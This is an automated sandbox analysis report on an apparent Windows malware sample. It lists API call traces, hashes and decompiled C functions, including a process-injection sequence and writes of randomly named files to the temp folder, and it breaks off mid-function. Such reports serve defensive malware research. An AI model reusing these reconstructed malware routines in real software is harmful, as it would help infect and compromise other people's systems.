                                                                                Line addresses: 0x00406cc9, 0x00406cd6, 0x00406dbe, 0x00406dc1, 0x00406dc1, 0x00406cee, 0x00406cfb, 0x00406d12, 0x00406d1c, 0x00406d40, 0x00406d60, 0x00406d69, 0x00406d6e, 0x00406d6e, 0x00406d86, 0x00406d8f, 0x00406d98, 0x00406d99, 0x00406d99, 0x00406d9e, 0x00406d9f, 0x00406d9f, 0x00406da1, 0x00406da4, 0x00000000, 0x00406da6, 0x00406da6, 0x00406daf, 0x00406db1, 0x00406db8, 0x00406db8, 0x00000000, 0x00406daf, 0x00406da4, 0x00406cfd, 0x00406cfe, 0x00406d03, 0x00000000, 0x00000000, 0x00000000, 0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                • API String ID: 1082366364-3395550214
                                                                                • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E39A18
                                                                                • GetThreadContext.KERNEL32(?,?), ref: 00E39A52
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00E39A60
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E39A98
                                                                                • SetThreadContext.KERNEL32(?,00010002), ref: 00E39AB5
                                                                                • ResumeThread.KERNEL32(?), ref: 00E39AC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction ID: fcdd03f8c58b34922b9dd1c7227b802150acea29ebcceb532367452251325ad9
                                                                                • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction Fuzzy Hash: A1212AB1E01219BBDB119BA1DC09EEF7FBCEF04754F404161FA19F1051E7B58A44CAA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • inet_addr.WS2_32(004102D8), ref: 00E31C18
                                                                                • LoadLibraryA.KERNEL32(004102C8), ref: 00E31C26
                                                                                • GetProcessHeap.KERNEL32 ref: 00E31C84
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 00E31C9D
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 00E31CC1
                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 00E31D02
                                                                                • FreeLibrary.KERNEL32(?), ref: 00E31D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                • String ID:
                                                                                • API String ID: 2324436984-0
                                                                                • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction ID: 4ea6581a8dec1792097e3df6467446c7122d18578afb389f854346340562d7c4
                                                                                • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction Fuzzy Hash: 7D315832E00209BFCB119FA4DC8C8EEBEB9EB46306F6454BEE501B2110D7B54E80DB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00E36CE4
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00E36D22
                                                                                • GetLastError.KERNEL32 ref: 00E36DA7
                                                                                • CloseHandle.KERNEL32(?), ref: 00E36DB5
                                                                                • GetLastError.KERNEL32 ref: 00E36DD6
                                                                                • DeleteFileA.KERNEL32(?), ref: 00E36DE7
                                                                                • GetLastError.KERNEL32 ref: 00E36DFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                • String ID:
                                                                                • API String ID: 3873183294-0
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: 39ee515289d3234fa64e87a433f7840d804dc9b273e461147af512525a5fa502
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: 8931CE76A00249BFCB01AFB49D89AEE7FB9EB88314F54C065E251F3251D7708A94CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,00E37043), ref: 00E36F4E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00E36F55
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00E36F7B
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00E36F92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$\\.\pipe\seokopfr
                                                                                • API String ID: 1082366364-4284735196
                                                                                • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction ID: 45be5597d9c9d89c28c0f86444e6adc464bfe64488a69aa53ba4d46146b0fbcd
                                                                                • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction Fuzzy Hash: FE21686174134079F3325730AC8DFFB3E8C8B12718F08A0A5F440F6092DAD988D6C2AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: $localcfg
                                                                                • API String ID: 1659193697-2018645984
                                                                                • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction ID: edfb25445282be10b9f5cd8fee03a87467fca6b6d56793bbb6f0c2c2100bd177
                                                                                • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction Fuzzy Hash: 89711772A00304AADF319A58DC8EFEE7F699B0130DF2C6076F985B6091DA628DC4C757
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                				CHAR* _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				CHAR* _v20;
                                                                                				intOrPtr _v24;
                                                                                				CHAR* _v28;
                                                                                				CHAR* _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v37;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr _t95;
                                                                                				int _t126;
                                                                                				void* _t136;
                                                                                				void* _t138;
                                                                                				CHAR* _t139;
                                                                                				void* _t146;
                                                                                				char _t150;
                                                                                				void* _t154;
                                                                                				void* _t158;
                                                                                				void* _t159;
                                                                                
                                                                                				_t146 = __edx;
                                                                                				_v20 = 0;
                                                                                				E0040DD05();
                                                                                				_t150 = _a4;
                                                                                				_t158 = E0040DD84(_t150, _a8);
                                                                                				_pop(_t138);
                                                                                				if(_t158 != 0) {
                                                                                					L2:
                                                                                					_t16 = _t158 + 0x30; // 0x30
                                                                                					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                					_t136 = _t21;
                                                                                					_t87 = lstrlenA(_a16) + _t136 + 1;
                                                                                					_v16 = _t87;
                                                                                					if(_v8 == 0) {
                                                                                						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                						_v12 = _v12 & 0x00000000;
                                                                                						_v8 = _t139;
                                                                                						_t152 = _t139;
                                                                                					} else {
                                                                                						_t126 = lstrlenA(_v8);
                                                                                						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                						_v12 = _t126 + _t136 + 1;
                                                                                						_t87 = _v16;
                                                                                						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                					}
                                                                                					if(_v12 == _t87) {
                                                                                						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                						_t77 = _t158 + 0x30; // 0x30
                                                                                						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
                                                                                							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                							 *0x4136c0 = 1;
                                                                                						}
                                                                                					} else {
                                                                                						_t41 = _t87 + 0x24; // 0x24
                                                                                						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                						if(_t154 != 0) {
                                                                                							_t43 = _t158 + 0xc; // 0xc
                                                                                							E0040EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                							_v20 =  &(_v8[_t154]);
                                                                                							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                							_t66 = _t154 + 0x24; // 0x24
                                                                                							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                							E0040EC2E(_t154);
                                                                                							_v20 = 1;
                                                                                						}
                                                                                					}
                                                                                					L10:
                                                                                					E0040DD69();
                                                                                					return _v20;
                                                                                				}
                                                                                				_v56 = _t150;
                                                                                				_v28 = 0;
                                                                                				_v24 = 3;
                                                                                				lstrcpynA( &_v52, _a8, 0x10);
                                                                                				_v37 = 0;
                                                                                				_v32 = 0;
                                                                                				_v36 = E004024C2( &_v20, 0, 0);
                                                                                				E0040DF4C(_t146,  &_v56);
                                                                                				_t158 = E0040DD84(_t150, _a8);
                                                                                				_t159 = _t159 + 0x18;
                                                                                				if(_t158 == 0) {
                                                                                					goto L10;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00E3DF6C: GetCurrentThreadId.KERNEL32 ref: 00E3DFBA
                                                                                • lstrcmp.KERNEL32(00410178,00000000), ref: 00E3E8FA
                                                                                • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,00E36128), ref: 00E3E950
                                                                                • lstrcmp.KERNEL32(?,00000008), ref: 00E3E989
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 2920362961-1846390581
                                                                                • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction ID: 1bb4ebf6547023a2684384259ae47e7cdbf92d4d1be73310609372c126951094
                                                                                • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction Fuzzy Hash: 2231AD31600705DBCB718F24C888BA67FE4EB89328F1199AAE556A7691D370EC80CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction ID: 0861db9ae087e8cb0499025305d6dd6812b36367edf559d147c65dc663d15d71
                                                                                • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction Fuzzy Hash: A7215B7A204115BFDB109B72EC4DEDF3FEDDB48364F209421F502E1091EA709A04D678
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 43%
                                                                                			E00406BA7(CHAR* _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				long _t14;
                                                                                				int _t19;
                                                                                				void* _t28;
                                                                                				void* _t39;
                                                                                
                                                                                				_push(_t30);
                                                                                				if(IsBadCodePtr( *0x4130ac) == 0) {
                                                                                					_push( &_v8);
                                                                                					_push(0);
                                                                                					if( *0x4130ac() == 0) {
                                                                                						_t28 = E0040EBCC(_v8);
                                                                                						if(_t28 == 0) {
                                                                                							L7:
                                                                                							_t14 = 0;
                                                                                						} else {
                                                                                							_push( &_v8);
                                                                                							_push(_t28);
                                                                                							if( *0x4130ac() == 0) {
                                                                                								_v12 = 0;
                                                                                								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                								if(_t39 != 0xffffffff) {
                                                                                									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
                                                                                									_push(_t39);
                                                                                									if(_t19 != 0) {
                                                                                										CloseHandle();
                                                                                										E0040EC2E(_t28);
                                                                                										_t14 = _v8;
                                                                                									} else {
                                                                                										CloseHandle();
                                                                                										DeleteFileA(_a4);
                                                                                										goto L9;
                                                                                									}
                                                                                								} else {
                                                                                									L9:
                                                                                									E0040EC2E(_t28);
                                                                                									_t14 = 0;
                                                                                								}
                                                                                							} else {
                                                                                								E0040EC2E(_t28);
                                                                                								goto L7;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t14 = 0;
                                                                                					}
                                                                                					return _t14;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?), ref: 00E392E2
                                                                                • wsprintfA.USER32 ref: 00E39350
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00E39375
                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 00E39389
                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 00E39394
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00E3939B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction ID: e10412743ab38f998a5e8ccb4f69156e14a9bebbe1907d4a93e3afdfe081bf43
                                                                                • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction Fuzzy Hash: E31172B17401147BE7206731EC0EFEF3EADDBC8B10F008065BB09B5191EAB44E45C664
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 63%
                                                                                			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
                                                                                				long _v8;
                                                                                				char _v1032;
                                                                                				signed int _t29;
                                                                                				signed int _t62;
                                                                                				void* _t64;
                                                                                
                                                                                				GetTempPathA(0x400,  &_v1032);
                                                                                				E00408274( &_v1032);
                                                                                				_t29 = E0040ECA5();
                                                                                				_t62 = 9;
                                                                                				_push(_t29 % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push( &_v1032);
                                                                                				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
                                                                                				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
                                                                                				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
                                                                                				if(_t64 <= 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
                                                                                				CloseHandle(_t64);
                                                                                				return 1;
                                                                                			}

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                • wsprintfA.USER32 ref: 004090E9
                                                                                • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040DD05() {
                                                                                				long _t4;
                                                                                				long _t10;
                                                                                
                                                                                				_t10 = GetTickCount();
                                                                                				while(InterlockedExchange(0x4136b4, 1) != 0) {
                                                                                					if(GetCurrentThreadId() !=  *0x4136b8) {
                                                                                						if(GetTickCount() - _t10 >= 0x2710) {
                                                                                							 *0x4136bc =  *0x4136bc & 0x00000000;
                                                                                						} else {
                                                                                							Sleep(0);
                                                                                							continue;
                                                                                						}
                                                                                					}
                                                                                					L7:
                                                                                					_t4 = GetCurrentThreadId();
                                                                                					 *0x4136bc =  *0x4136bc + 1;
                                                                                					 *0x4136b8 = _t4;
                                                                                					return _t4;
                                                                                				}
                                                                                				goto L7;
                                                                                			}

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0040E538,?,74CB43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00E3C6B4
                                                                                • InterlockedIncrement.KERNEL32(00E3C74B), ref: 00E3C715
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,00E3C747), ref: 00E3C728
                                                                                • CloseHandle.KERNEL32(00000000,?,00E3C747,00413588,00E38A77), ref: 00E3C733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 1026198776-1857712256
                                                                                • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction ID: af389a3b46b8c1f4a550058f4d716a9ff55dd33241da05117dcc4e361e7b3b7d
                                                                                • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction Fuzzy Hash: 0F5150B1601B419FD7249F29C5C952ABBE9FB48704F60693EE18BE7A90D774F840CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004080C9(int* __ecx) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				char _v52;
                                                                                				char _v312;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				char* _t35;
                                                                                				char* _t42;
                                                                                				char* _t45;
                                                                                				intOrPtr* _t49;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t57;
                                                                                				void* _t60;
                                                                                				intOrPtr _t63;
                                                                                				void* _t65;
                                                                                				void* _t68;
                                                                                				char _t70;
                                                                                				intOrPtr _t71;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                				_v8 = 0;
                                                                                				 *0x412c3c = 0;
                                                                                				 *0x412c38 = 0;
                                                                                				if(E00406EC3() != 0) {
                                                                                					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
                                                                                					_t65 = _t65 + 0x14;
                                                                                					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
                                                                                						goto L20;
                                                                                					} else {
